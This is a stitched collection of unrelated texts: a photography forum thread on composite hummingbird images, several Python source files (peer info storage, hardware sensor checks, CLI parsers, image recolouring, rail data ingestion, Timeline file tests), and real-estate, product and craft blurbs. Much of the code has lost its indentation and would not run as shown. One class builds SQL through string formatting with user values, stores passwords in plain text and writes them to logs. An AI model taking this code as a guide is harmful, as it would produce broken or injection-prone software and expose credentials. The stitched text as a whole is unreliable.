Take a look at the hummingbird image above. It is a composite. I took a shot of a hummingbird visiting one of our feeders and combined it with a flower from our neighbor’s yard that hummingbirds do visit. Is this a wildlife image? I don’t think so. I wouldn’t enter it in a wildlife contest. Is it an art image? I think it is OK as an art image as long as I don’t call it wildlife. Whether you like the actual composite image or not, what is your opinion of the concept? I’m guessing that opinions will be all across the spectrum.
It must be common practice to do this. I always wondered how these images were captured. I’ve been in awe of the skill and good fortune that I believed it took to do so. Now I know that post processing and combining images in Photoshop, I guess, is as important as learning to use your camera. I’m not at that level where I can create a photo and it does feel a little like cheating because you never know what’s real.
You are right, Pat, it is hard to know these days. It might be possible to get enough shutter speed to freeze the hummingbird and get enough depth of field to get all the flower in focus and have a pleasing background, but it would be hard. A lot of pictures are post processed or captured in unique places where they are easier than in a normal wildlife situation. It leaves us with the question of whether it is still OK as art if we are honest about the way the image was made.
I have to agree with the distinction between nature photography and art photography.
Do those take a nature shot and turn it into an art shot?
Difficult questions. For now, for me, a photo is meant less to be representational and more to be inspirational. I’m not capturing a moment, I’m capturing an emotion.
No real solution… just thoughts.
This is not new to digital processing. Ansel Adams was a master at dodging and burning in the darkroom. I have seen straight prints of his negatives as examples and they are not as remarkable as the images he created with his manipulations in the darkroom. There are examples of replacing the sky in film images also. This didn’t just start with Photoshop. There is a place for journalism, but I think most people want beautiful art on their walls and not a field guide picture.
I can’t afford those programs and probably don’t have the patience to learn them. I am able to do the basics on iPhoto. I seldom print anything, so my images I share online with friends. I’m not against those who Photoshop, Lightroom, or whatever. I just want to enjoy what is shared. We each have our own way of seeing, interpreting, and revealing the GSMNP to others. I do hope others like my “vision” and it is ego fulfilling to a point.
It is a big world with room for many different approaches. We can all enjoy photography in our own way.
I did a double-take when I first saw this photo. I thought the Cypress Vine flower was very large or the hummingbird was quite small! 🙂 Interesting effect.
I have always been a believer in getting as much “in the box” as possible. I learned Photoshop basics (CS3) so that I could adjust images that needed a little help – primarily from shooting under less than optimal conditions. It’s nice to know what you can do to “fix” an image. Normal enhancements (cropping, saturation, dark/light and sharpening) are a necessary fact of life with a digital camera’s limitations. I object when images are distorted or have major color shifts (sunrises/sunsets!). Composites are fun, but they’re not photography – closer to scrapbooking, in my opinion. All that said, a pleasing image is a pleasing image. If the photographer/artist owns up to what has been done, it’s fine. A lot of us are limited in the wilderness available to us. I like to shoot at zoos and I have entered the images in contests, with the disclaimer that it is a zoo shot.
I like to shoot backyard birds and critters. I don’t “bait” – but we do run feeders for the birds. Is a Thrasher or a Towhee in the bushes and beds of a backyard any less “wildlife” than a moose in the field?
Final thought is that whatever is fun for the shooter is probably OK, just tell folks what was done to capture the image if you want to pass it off.
Thanks for the forum. I have had the same debate over “macro” photography.
I agree. Truth is the important thing.
This is my first time reading feedback on photography. My conclusion is I have been so naive and have a lot to learn. Tyson, thank you very much for all your hard work and sharing it to everyone. Thank you everyone for your feedback.
My goodness; so much fuss over the distinction between “Nature Photography” and “Art Photography.” All of the really great nature photographs require tremendous personal sacrifice to be in the right place at the right time coupled with skillful manipulation of the best equipment, or blind fool’s luck to have been there by accident. I pray for the opportunity to be God’s photojournalist and am often rewarded with photo ops just for paying attention to His works. The beauty isn’t mine; it’s His creation. Should I not polish it up the best I can?
To enhance a photograph by whatever means the artist has mastered is by no means a crime. Post processing provides a much needed extension of the medium’s inherent limitations. I say if you don’t engage in post processing you are only half an artist. The bone of contention arises when elements are added that weren’t there to begin with. Photojournalism requires compliance with strictly recording the scene fully intact; nothing added or subtracted. Just the truth of what was there at that instant.
Hey, photojournalism isn’t art! If a photographer wishes to be respected as an artist, manipulation of the final product is required. It is, in fact, the measure of his art. There are great technicians and great artists. So which do you want to be?
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 S2S Network Consultoria e Tecnologia da Informacao LTDA
#
# Author: Zhongjie Wang <wzj401@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import cPickle
from umit.icm.agent.logger import g_logger
from umit.icm.agent.Global import *
from umit.icm.agent.Application import theApp
from umit.icm.agent.Version import PEER_TYPE
"""
This class contains information about the peer. It is not used to
represent other peers; it should only be used to represent the
connected peer.
"""
class PeerInfo(object):
""""""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.ID = None
self.Type = PEER_TYPE # normal peer by default
self.Username = ''
self.Password = ''
self.Email = ''
self.CipheredPublicKeyHash = None
self.AuthToken = None
self.local_ip = ''
self.internet_ip = ''
self.is_registered = False
self.is_logged_in = False
self.get_local_ip()
self.get_internet_ip()
def load_from_db(self):
rs = g_db_helper.select('select * from peer_info')
if not rs:
g_logger.info("No peer info in db.")
else:
if len(rs) > 1:
g_logger.warning("More than one record in peer_info. " \
"Use the first one.")
g_logger.debug(rs[0])
self.ID = rs[0][0]
self.Username = rs[0][1]
self.Password = rs[0][2]
self.Email = rs[0][3]
self.CipheredPublicKeyHash = rs[0][4]
self.Type = rs[0][5]
self.is_registered = True
def save_to_db(self):
if self.is_registered:
sql_str = "insert or replace into peer_info values " \
"('%s', '%s', '%s', '%s', '%s', %d)" % \
(self.ID, self.Username, self.Password, self.Email,
self.CipheredPublicKeyHash, self.Type)
g_logger.info("[save_to_db]: save %s into DB" % sql_str)
g_db_helper.execute(sql_str)
g_db_helper.commit()
def clear_db(self):
g_db_helper.execute("delete from peer_info")
g_db_helper.commit()
def get_local_ip(self):
from socket import socket, SOCK_DGRAM, AF_INET
ip_urls = ["www.google.com", "www.baidu.com"]
for each in ip_urls:
try:
s = socket(AF_INET, SOCK_DGRAM)
s.settimeout(3)
s.connect((each, 0))
ip = s.getsockname()[0]
self.local_ip = ip
#print(each, ip)
break
except Exception:
pass
def get_internet_ip(self):
from twisted.web.client import getPage
ip_urls = ["http://whereismyip.com/", "http://www.whereismyip.org/",
"http://myip.eu/"]
for each in ip_urls:
getPage(each).addCallback(self._handle_get_internet_ip)
def _handle_get_internet_ip(self, data):
import re
match = re.search(r'\d+\.\d+\.\d+\.\d+', data)
if match is None:
    return
ip = match.group(0)
#print(data, ip)
self.internet_ip = ip
if __name__ == "__main__":
pi = PeerInfo()
pi.load_from_db()
|
Check out what inspired each book!
Follow Emma Locke’s board The Trouble With Being Wicked on Pinterest.
Follow Emma Locke’s board The Problem With Seduction on Pinterest.
Follow Emma Locke’s board A Game of Persuasion on Pinterest.
Follow Emma Locke’s board The Art of Ruining a Rake on Pinterest.
Follow Emma Locke’s board The Cheer in Charming an Earl on Pinterest.
|
"""
.. module:: sensors
:platform: unix
:synopsis: Provides checks for system sensors and SMART devices
.. moduleauthor:: Colin Alston <colin@imcol.in>
"""
import os
from zope.interface import implementer
from twisted.internet import defer
from duct.interfaces import IDuctSource
from duct.objects import Source
@implementer(IDuctSource)
class Sensors(Source):
"""Returns hwmon sensors info
Note: There is no transformation done on values, they may be in
thousands
**Metrics:**
:(service name).(adapter).(sensor): Sensor value
"""
def _find_sensors(self):
path = '/sys/class/hwmon'
sensors = {}
# Find adapters
if os.path.exists(path):
monitors = os.listdir(path)
for hwmons in monitors:
mon_path = os.path.join(path, hwmons)
name_path = os.path.join(mon_path, 'name')
if os.path.exists(name_path):
with open(name_path, 'rt') as name_file:
name = name_file.read().strip()
else:
name = None
if name not in sensors:
sensors[name] = {}
sensor_map = {}
# Find sensors in this adapter
for mon_file in os.listdir(mon_path):
if mon_file.startswith('temp') or mon_file.startswith(
'fan'):
tn = mon_file.split('_')[0]
sensor_path = os.path.join(mon_path, mon_file)
if tn not in sensor_map:
sensor_map[tn] = [None, 0]
if mon_file.endswith('_input'):
with open(sensor_path, 'rt') as value_file:
value = int(value_file.read().strip())
if mon_file.startswith('temp'):
value = value / 1000.0
sensor_map[tn][1] = value
if mon_file.endswith('_label'):
with open(sensor_path, 'rt') as value_file:
sensor_name = value_file.read().strip()
sensor_map[tn][0] = sensor_name
for sensor_name, value in sensor_map.values():
if sensor_name:
filtered_name = sensor_name.lower().replace(' ', '_')
sensors[name][filtered_name] = value
return sensors
def get(self):
sensors = self._find_sensors()
events = []
for adapter, v in sensors.items():
for sensor, val in v.items():
events.append(
self.createEvent('ok',
'Sensor %s:%s - %s' % (
adapter, sensor, val),
val,
prefix='%s.%s' % (adapter, sensor,)))
return events
@implementer(IDuctSource)
class LMSensors(Source):
"""Returns lm-sensors output
This does the exact same thing as the Sensors class but uses lm-sensors.
**Metrics:**
:(service name).(adapter).(sensor): Sensor value
"""
ssh = True
@defer.inlineCallbacks
def _get_sensors(self):
out, _err, code = yield self.fork('/usr/bin/sensors')
if code == 0:
defer.returnValue(out.strip('\n').split('\n'))
else:
defer.returnValue([])
def _parse_sensors(self, sensors):
adapters = {}
adapter = None
for i in sensors:
l = i.strip()
if not l:
continue
if ':' in l:
n, v = l.split(':')
vals = v.strip().split()
if n == 'Adapter':
continue
if '\xc2\xb0' in vals[0]:
val = vals[0].split('\xc2\xb0')[0]
elif len(vals) > 1:
val = vals[0]
else:
continue
val = float(val)
adapters[adapter][n] = val
else:
adapter = l
adapters[adapter] = {}
return adapters
@defer.inlineCallbacks
def get(self):
sensors = yield self._get_sensors()
adapters = self._parse_sensors(sensors)
events = []
for adapter, v in adapters.items():
for sensor, val in v.items():
events.append(
self.createEvent('ok',
'Sensor %s:%s - %s' % (
adapter, sensor, val),
val,
prefix='%s.%s' % (adapter, sensor,)))
defer.returnValue(events)
@implementer(IDuctSource)
class SMART(Source):
"""Returns SMART output for all disks
**Metrics:**
:(service name).(disk).(sensor): Sensor value
"""
ssh = True
def __init__(self, *a, **kw):
Source.__init__(self, *a, **kw)
self.devices = []
@defer.inlineCallbacks
def _get_disks(self):
out, _err, code = yield self.fork('/usr/sbin/smartctl',
args=('--scan',))
if code != 0:
defer.returnValue([])
out = out.strip('\n').split('\n')
devices = []
for ln in out:
if '/dev' in ln:
devices.append(ln.split()[0])
defer.returnValue(devices)
@defer.inlineCallbacks
def _get_smart(self, device):
out, _err, code = yield self.fork('/usr/sbin/smartctl',
args=('-A', device))
if code == 0:
defer.returnValue(out.strip('\n').split('\n'))
else:
defer.returnValue([])
def _parse_smart(self, smart):
mark = False
attributes = {}
for l in smart:
ln = l.strip('\n').strip()
if not ln:
continue
if mark:
(_id, attribute, _flag, _val, _worst, _thresh, _type, _u, _wf,
raw) = ln.split(None, 9)
try:
raw = int(raw.split()[0])
attributes[attribute.replace('_', ' ')] = raw
except (ValueError, IndexError):
pass
if ln[:3] == 'ID#':
mark = True
return attributes
@defer.inlineCallbacks
def get(self):
if not self.devices:
self.devices = yield self._get_disks()
events = []
for disk in self.devices:
smart = yield self._get_smart(disk)
stats = self._parse_smart(smart)
for sensor, val in stats.items():
events.append(
self.createEvent('ok',
'Attribute %s:%s - %s' % (
disk, sensor, val),
val,
prefix='%s.%s' % (disk, sensor,))
)
defer.returnValue(events)
|
The ConDor unit helps Dorot's customers all over the world control hydraulic valves remotely and optimize their performance.
Thanks to its advanced control algorithm, customers can monitor the performance of valves and change settings remotely.
ConDor offers unlimited control functions, giving you the ability to create and change any valve application and configure its functions freely.
|
# -*- coding: utf-8 -*-
"""Description of the arguments of the command line interface."""
import argparse
def create_parser():
"""Create command line arguments parser"""
parser = argparse.ArgumentParser(description='Helicon Zoo command line')
# print settings from settings.yaml
parser.add_argument('--get-settings', action='store_true', help='get current settings')
# write settings to settings.yaml
parser.add_argument('--set-settings', dest="set_settings", nargs="+", help='set settings')
    # set urls of additional feeds
    parser.add_argument('--feed-urls', dest='urls', nargs='*', default=[], help='feed urls to load')
# print installed products
parser.add_argument('--list-installed', action='store_true', dest='show_installed',
help='show all installed programs')
    # run tests over installed products
    parser.add_argument('--run-tests', action='store_true', dest='run_test',
                        help='run tests over software')
# print all products
parser.add_argument('--list', action='store_true', dest='list_products',
help='list latest versions of all available products')
# custom settings path
parser.add_argument('--settings', dest='settings', default=None, help='search the settings in custom directory')
# custom data dir
parser.add_argument('--data-dir', dest='data_dir', default=None, help='default data directory')
# search products
parser.add_argument('--search', dest='search', help='search products for name and descriptions')
# search installed products and write they to current.yaml
parser.add_argument('--sync', action='store_true', dest='sync', help='synchronize installed version of products from system')
    # set products to install or uninstall
    parser.add_argument('--products', dest='products', nargs="*", help='product names to install/uninstall')
    # make install
    parser.add_argument('--install', dest='install', action='store_true', help='install specified products')
# set install parameters for products to install
parser.add_argument('--parameters', dest='parameters', nargs="?", help="application install parameters\n\
Format: --parameters param1=val1 product2@param2=val2 ...")
# set install parameters for products to install
parser.add_argument('-pj', '--data-parameters-json',
dest='json_params',
nargs="?",
help="install with parameters in file json format")
# set install parameters for products to install
parser.add_argument('-py', '--data-parameters',
dest='yml_params',
nargs="?",
help="install with parameters in file yaml format")
# make uninstall
parser.add_argument('--uninstall', action='store_true', dest='uninstall', help='uninstall a program')
    # quiet mode
parser.add_argument('-q', '--quiet', action='store_true', dest='quiet', default=False,
help='don\'t print anything to stdout')
# allow communicate with user during install process
parser.add_argument('-i', '--interactive', action='store_true', dest='interactive', default=False,
help='allow to ask install parameters if needed')
# ignore any errors
parser.add_argument('-f', '--force', action='store_true', dest='force', default=False, help='ignore exit code')
# set log level
parser.add_argument('--log-level', dest='log_level', default=None,
help='set log level (debug, warning, info, error, critical)')
# start ui web server
parser.add_argument('--run-server', dest='run_server', action='store_true', help='run web ui at http://localhost:7799/')
# set ui server port
parser.add_argument('--run-server-addr', dest='run_server_addr', default='7799', help='bind web ui server to "addr:port" or port')
# start install/unstall task
    parser.add_argument('--start-install-worker', dest='worker_task_id', type=int, help='start supervisor worker')
parser.add_argument('-l', '--task-log', dest='task_log',
nargs="?", default=None,
help='specify log for task if not specified will print to stdout')
parser.add_argument('--task-work', dest='task_id', type=int, help='start installer worker with task by id')
    # compile zoo feed from src to dest
    parser.add_argument('--compile-repository', nargs=2, dest="zoo_compile",
                        help='compile zoo feed; first argument is the source feed directory, second the destination feed')
return parser
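A short usage sketch of the parser above. The snippet rebuilds just two of the flags locally so it is self-contained; in the real module you would call `create_parser()` instead:

```python
import argparse

# Minimal sketch: two of the flags defined by create_parser() above.
parser = argparse.ArgumentParser(description='Helicon Zoo command line')
parser.add_argument('--list', action='store_true', dest='list_products',
                    help='list latest versions of all available products')
parser.add_argument('--log-level', dest='log_level', default=None,
                    help='set log level')

args = parser.parse_args(['--list', '--log-level', 'debug'])
print(args.list_products, args.log_level)  # → True debug
```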
|
Advancements in medical technology have given us new ways to create our families. In many instances, the law has not kept pace with the science. We want to make sure that you and your children are protected.
|
"""
Magically manipulate and return the doge image.
"""
from math import floor
import numpy as np
from PIL import Image
from colorsys import rgb_to_hls, hls_to_rgb
LIGHT = (172, 143, 239)
DARK = (134, 30, 214)
def scrub_rgb(c):
return (int(floor(c[0] * 255)),
int(floor(c[1] * 255)),
int(floor(c[2] * 255)))
def get_color_pallete(c):
"""
    Given an RGB color c, return new light and dark RGB colors.
"""
hls_d = rgb_to_hls(c[0]/255., c[1]/255., c[2]/255.)
# Magic numbers are the diff from hls(DARK) and hls(LIGHT).
hls = (hls_d[0] - 0.04385, hls_d[1] + 0.27059, hls_d[2])
new_dark = scrub_rgb(hls_to_rgb(hls_d[0], hls_d[1], hls_d[2]))
new_light = scrub_rgb(hls_to_rgb(hls[0], hls[1], hls[2]))
return new_light, new_dark
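The "magic numbers" in the comment above can be recovered from the two template colours themselves rather than hard-coded, which makes their origin explicit:

```python
from colorsys import rgb_to_hls

# Derive the hue/lightness offsets between the two doge template colours.
LIGHT = (172, 143, 239)
DARK = (134, 30, 214)

hls_light = rgb_to_hls(*(c / 255. for c in LIGHT))
hls_dark = rgb_to_hls(*(c / 255. for c in DARK))

hue_offset = hls_dark[0] - hls_light[0]        # ~0.04385
lightness_offset = hls_light[1] - hls_dark[1]  # ~0.27059
```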
class ImageManager(object):
"""
Manages the doge template and does the conversion.
"""
_light = LIGHT
_dark = DARK
def __init__(self, image=None, light=None, dark=None):
if light:
self._light = light
if dark:
self._dark = dark
if not image:
self._image = Image.open("doge.png").convert("RGB")
else:
self._image = image.convert("RGB")
self._data = np.array(self._image.convert("RGB"))
def put_color(self, c):
new_light, new_dark = get_color_pallete(c)
return self.put(new_light, new_dark)
def put(self, new_light, new_dark):
data = np.copy(self._data)
data[(data == LIGHT).all(axis=-1)] = new_light
data[(data == DARK).all(axis=-1)] = new_dark
return Image.fromarray(data, mode="RGB")
|
NEW PRICE! The classic appeal of the three-bedroom ‘Hampton’ lies in its spacious and carefully-planned layout. The living room opens into the garden, with a kitchen/dining room for sharing mealtimes, while an en-suite master bedroom and two further good-sized bedrooms are found upstairs. Home includes blinds throughout.
Abbey View features a stunning collection of 1 bedroom apartments, 2, 3, 4 and 5 bedroom homes located in the beautiful town of Farnham, Surrey.
The Wilton, a traditional 5 bedroom home is perfect for families looking for extra space. With an open-plan kitchen/dining area and a separate living room, there is space for everyone.
This traditional 4 bedroom home has been designed to suit growing families. The open-plan kitchen/dining area opens through double doors to the private rear garden.
This 3 bedroom home is perfect for young couples and growing families. With a large living room, separate kitchen/dining area and a study, there’s plenty of space for all.
A modern 3 bedroom home perfectly designed for people wanting to downsize. With a large living room and separate kitchen/dining area there’s plenty of space for all.
Pembroke Manor is a delightful collection of brand new 2 and 3 bedroom apartments located in the charming village of Hook.
NEW PRICE! Plot 5 is a wonderful 2 bedroom first floor apartment featuring an open plan kitchen/living/dining room and master bedroom with en suite shower room and second double bedroom offering thoughtful design perfectly suited for contemporary living.
Plot 34 is a wonderful 2 bedroom second floor apartment featuring an open plan kitchen/living/dining room and master bedroom with en suite shower room and a second double bedroom.
NEW PRICE! This third floor apartment features an open plan kitchen/living/dining room, en-suite to master bedroom, two storage cupboards to help free up space. With allocated parking space.
A beautiful collection of 2, 3, 4, 5 bedroom homes, located in the wonderful country setting of West End in Surrey. Only a short distance away from the village centre and the added luxury of fantastic transport links nearby.
Visit our 4 & 5 bedroom show homes to see what it could be like living in one of our homes.
Four bedroom detached home built for family life! With four bedrooms and plenty of living space throughout. We have schemes available to get you moving, call us to find out more! With garage & 2 parking spaces.
Three bedroom home available with Help to Buy*. Open plan kitchen/dining area, separate living room, master bedroom with en suite and 2 further bedrooms.
Home comes with fully integrated kitchen, Electrolux appliances, flooring throughout, half-height tiling to wet rooms & turf to rear garden. Don't miss out! Garage & 2 parking spaces.
Open plan kitchen/dining area, separate living room, master bedroom with en suite and 2 further bedrooms. Call us to find out how we can help to get you moving.
STAMP DUTY PAID! The Crofton G is a classic townhouse with versatile living space over three storeys. The living/dining area extends across the full width of the house, ideal for entertaining and family living.
|
import argparse
from datetime import datetime, timedelta
import dateutil.relativedelta
from config import CONNECTION_STRING
from ingestion.etl import Etl
from ingestion.ingest import Ingest
CONNECTIONS_URL = 'http://graph.spitsgids.be/connections/?departureTime='
STATIONS_URL = 'https://irail.be/stations/NMBS'
FEEDBACK_URL = 'https://gtfs.irail.be/nmbs/feedback/occupancy-until-20161029.newlinedelimitedjsonobjects'
def valid_date(s):
try:
return datetime.strptime(s, "%Y-%m-%d")
except ValueError:
msg = "Not a valid date: '{0}'.".format(s)
raise argparse.ArgumentTypeError(msg)
parser = argparse.ArgumentParser(description='Parse ingest options')
# Switch
parser.add_argument('-w', '--wipe', action='store_const', const=True,
help='Wipe the database. Will drop all tables. Default is FALSE')
parser.add_argument('-f', '--forceIngest', action='store_const', const=True,
help="Don't skip existing ingest files. Default is FALSE")
parser.add_argument('-s', "--startDate", required=False, type=valid_date,
help="The Start Date - format YYYY-MM-DD. Default is 1 month ago.")
parser.add_argument('-e', "--endDate", required=False, type=valid_date,
help="The End Date - format YYYY-MM-DD. Default is now()")
parser.add_argument('-o', "--outputFolder", required=False,
help="The folder in which to store the files. Default is 'data/'")
args = parser.parse_args()
if args.endDate is not None:
END = args.endDate
else:
END = datetime.now()
END = END - timedelta(minutes=END.minute % 10, seconds=END.second, microseconds=END.microsecond)
if args.startDate is not None:
START = args.startDate
else:
START = END - dateutil.relativedelta.relativedelta(months=1)
WIPE = args.wipe if args.wipe is not None else False
FOLDER = args.outputFolder if args.outputFolder is not None else 'data'
FORCE_INGEST = args.forceIngest if args.forceIngest is not None else False
print("Ingesting from %s to %s. Initialize=%s" % (START, END, WIPE))
ingest = Ingest(CONNECTIONS_URL, STATIONS_URL, FEEDBACK_URL, START, END, FOLDER, FORCE_INGEST)
ingest.run()
etl = Etl(CONNECTION_STRING, FOLDER, WIPE)
etl.run()
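The END timestamp above is truncated to the previous 10-minute boundary. That rounding step can be isolated as a small helper:

```python
from datetime import datetime, timedelta

def round_down_10min(dt):
    # Truncate to the previous 10-minute boundary, as done for END above.
    return dt - timedelta(minutes=dt.minute % 10,
                          seconds=dt.second,
                          microseconds=dt.microsecond)

print(round_down_10min(datetime(2016, 10, 29, 14, 37, 22)))
# → 2016-10-29 14:30:00
```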
|
By 2022, more than 4 in 10 employees around the world are expected to be mobile, according to Strategy Analytics. With an increasing need for workplace mobility, Acer has incorporated Gemalto miniaturized embedded SIM (eSIM) into its Swift 7 laptops to offer ultra-portable always-connected PCs that enable users to be connected on the go.
“With Gemalto’s proven expertise in eSIM deployment, the Acer Swift 7 can help professionals stay productive with flexible and seamless connectivity on the go,” said Jerry Hou, General Manager, Consumer Notebooks, IT Products Business, Acer. “Similar to smartphones, always-connected PCs such as Acer’s Swift 7 will get notifications and pull data without ever disconnecting. We are delighted to provide this seamless connectivity, which will in turn help organizations better serve the needs of the growing pool of mobile workers,” said Sashidhar Thothadri, senior vice president, Mobile Services & IOT Asia, Gemalto.
|
from utils import create_newfig, create_moving_line, create_still_segment, run_or_export
func_code = 'af'
func_name = 'test_line_line_touching'
def setup_fig01():
fig, ax, renderer = create_newfig('{}01'.format(func_code))
create_moving_line(fig, ax, renderer, (1, 3), (2, 3), (3, -3), 'top')
create_still_segment(fig, ax, renderer, (3, 3), (5, 0), 'topright')
return fig, ax, '{}01_{}'.format(func_code, func_name)
def setup_fig02():
fig, ax, renderer = create_newfig('{}02'.format(func_code))
create_moving_line(fig, ax, renderer, (1, 1), (2, 1), (1, 1), 'bot')
create_still_segment(fig, ax, renderer, (3, 2), (3, 3), 'right')
return fig, ax, '{}02_{}'.format(func_code, func_name)
def setup_fig03():
fig, ax, renderer = create_newfig('{}03'.format(func_code))
create_moving_line(fig, ax, renderer, (1, 1), (2, 1), (2, 2), 'bot')
create_still_segment(fig, ax, renderer, (2, 3), (3, 3), 'top')
return fig, ax, '{}03_{}'.format(func_code, func_name)
def setup_fig04():
fig, ax, renderer = create_newfig('{}04'.format(func_code))
create_moving_line(fig, ax, renderer, (1, 1), (2, 1), (0, 2), 'bot')
create_still_segment(fig, ax, renderer, (2, 3), (3, 3), 'top')
return fig, ax, '{}04_{}'.format(func_code, func_name)
run_or_export(setup_fig01, setup_fig02, setup_fig03, setup_fig04)
|
This statement-making fascinator headband rises to the occasion with a twist mesh base and a fluffy bouquet of flighty feathers, all on an easy-to-wear headband with precision placement. This is a modern twist on the beloved fascinator. In this episode of Maid At Home, Hannah Read-Baldrey shows you how to make a beautiful butterfly fascinator - perfect for the bride or a wedding guest!
How to Make a Princess Beatrice-Inspired Butterfly Fascinator. How to Make an Ultra-Chic Fascinator Out of a Place Mat. How to Make a Kate Middleton-Inspired Feather Fascinator. If you are willing to try and make a similar butterfly headband yourself, you might want to purchase my .pdf tutorial on a lace butterfly made WITHOUT any special tools, which is available from my Etsy shop.
|
# Copyright (C) 2009, 2010, 2011 Rickard Lindberg, Roger Lindberg
#
# This file is part of Timeline.
#
# Timeline is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Timeline is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Timeline. If not, see <http://www.gnu.org/licenses/>.
import datetime
import unittest
from specs.utils import TmpDirTestCase
from timelinelib.db.backends.file import dequote
from timelinelib.db.backends.file import FileTimeline
from timelinelib.db.backends.file import quote
from timelinelib.db.backends.file import split_on_semicolon
from timelinelib.db.exceptions import TimelineIOError
from timelinelib.db.objects import TimePeriod
from timelinelib.drawing.viewproperties import ViewProperties
from timelinelib.time import PyTimeType
class FileTimelineSpec(TmpDirTestCase):
IO = True
def testCorruptData(self):
"""
Scenario: You open a timeline that contains corrupt data.
Expected result: You get an exception and you can not use the timeline.
"""
self.assertRaises(TimelineIOError, FileTimeline, self.corrupt_file)
def testMissingEOF(self):
"""
Scenario: A timeline is opened that contains no corrupt data. However,
no end of file marker is found.
Expected result: The timeline should be treated as corrupt.
"""
self.assertRaises(TimelineIOError, FileTimeline, self.missingeof_file)
def testAddingEOF(self):
"""
Scenario: You open an old timeline < 0.3.0 with a client >= 0.3.0.
Expected result: The timeline does not contain the EOF marker but since
it is an old file, no exception should be raised.
"""
FileTimeline(self._021_file)
def testInvalidTimePeriod(self):
"""
Scenario: You open a timeline that has a PREFERRED-PERIOD of length 0.
Expected result: Even if this is a valid value for a TimePeriod it
should not be a valid PREFERRED-PERIOD. The length must be > 0. So we
should get an error when trying to read this.
"""
self.assertRaises(TimelineIOError, FileTimeline,
self.invalid_time_period_file)
def testSettingInvalidPreferredPeriod(self):
"""
Scenario: You try to assign a preferred period whose length is 0.
Expected result: You should get an error.
"""
timeline = FileTimeline(self.valid_file)
now = datetime.datetime.now()
zero_tp = TimePeriod(PyTimeType(), now, now)
vp = ViewProperties()
vp.displayed_period = zero_tp
self.assertRaises(TimelineIOError, timeline.save_view_properties, vp)
def setUp(self):
TmpDirTestCase.setUp(self)
# Create temporary dir and names
self.corrupt_file = self.get_tmp_path("corrupt.timeline")
self.missingeof_file = self.get_tmp_path("missingeof.timeline")
self._021_file = self.get_tmp_path("021.timeline")
self.invalid_time_period_file = self.get_tmp_path("invalid_time_period.timeline")
self.valid_file = self.get_tmp_path("valid.timeline")
# Write content to files
HEADER_030 = "# Written by Timeline 0.3.0 on 2009-7-23 9:40:33"
HEADER_030_DEV = "# Written by Timeline 0.3.0dev on 2009-7-23 9:40:33"
HEADER_021 = "# Written by Timeline 0.2.1 on 2009-7-23 9:40:33"
self.write_timeline(self.corrupt_file, ["corrupt data here"])
self.write_timeline(self.missingeof_file, ["# valid data"])
self.write_timeline(self._021_file, [HEADER_021])
invalid_time_period = [
"# Written by Timeline 0.5.0dev785606221dc2 on 2009-9-22 19:1:10",
"PREFERRED-PERIOD:2008-12-9 11:32:26;2008-12-9 11:32:26",
"CATEGORY:Work;173,216,230;True",
"CATEGORY:Private;200,200,200;True",
"EVENT:2009-7-13 0:0:0;2009-7-18 0:0:0;Programming course;Work",
"EVENT:2009-7-10 14:30:0;2009-7-10 14:30:0;Go to dentist;Private",
"EVENT:2009-7-20 0:0:0;2009-7-27 0:0:0;Vacation;Private",
"# END",
]
self.write_timeline(self.invalid_time_period_file, invalid_time_period)
valid = [
"# Written by Timeline 0.5.0 on 2009-9-22 19:1:10",
"# END",
]
self.write_timeline(self.valid_file, valid)
def write_timeline(self, path, lines):
        f = open(path, "w")
        f.write("\n".join(lines))
        f.close()
class FileTimelineQuoteFunctionsSpec(unittest.TestCase):
def testQuote(self):
# None
self.assertEqual(quote("plain"), "plain")
# Single
self.assertEqual(quote("foo;bar"), "foo\\;bar")
self.assertEqual(quote("foo\nbar"), "foo\\nbar")
self.assertEqual(quote("foo\\bar"), "foo\\\\bar")
self.assertEqual(quote("foo\\nbar"), "foo\\\\nbar")
self.assertEqual(quote("\\;"), "\\\\\\;")
# Mixed
self.assertEqual(quote("foo\nbar\rbaz\\n;;"),
"foo\\nbar\\rbaz\\\\n\\;\\;")
def testDequote(self):
self.assertEqual(dequote("\\\\n"), "\\n")
def testQuoteDequote(self):
for s in ["simple string", "with; some;; semicolons",
"with\r\n some\n\n newlines\n"]:
self.assertEqual(s, dequote(quote(s)))
def testSplit(self):
self.assertEqual(split_on_semicolon("one;two\\;;three"),
["one", "two\\;", "three"])
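The quoting behaviour these tests specify can be sketched as a minimal reimplementation (an illustration of the escaping rules, not the actual timelinelib code):

```python
import re

def quote(s):
    # Escape backslashes first so later escapes stay unambiguous.
    s = s.replace("\\", "\\\\")
    s = s.replace("\n", "\\n")
    s = s.replace("\r", "\\r")
    return s.replace(";", "\\;")

def dequote(s):
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            # \n and \r map back to control chars; \\ and \; to literals.
            out.append({"n": "\n", "r": "\r"}.get(s[i + 1], s[i + 1]))
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

def split_on_semicolon(s):
    # Split on semicolons that are not preceded by a backslash.
    return re.split(r"(?<!\\);", s)
```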
|
Here at House Inspector Crew, we're ready to meet all your requirements when it comes to House Inspector in Saint Marys, PA. Our crew of experienced contractors can offer the expert services that you need with the most sophisticated technology available. Our products are of the highest quality and we can conserve your money. Give us a call by dialing 888-506-4448 to get started.
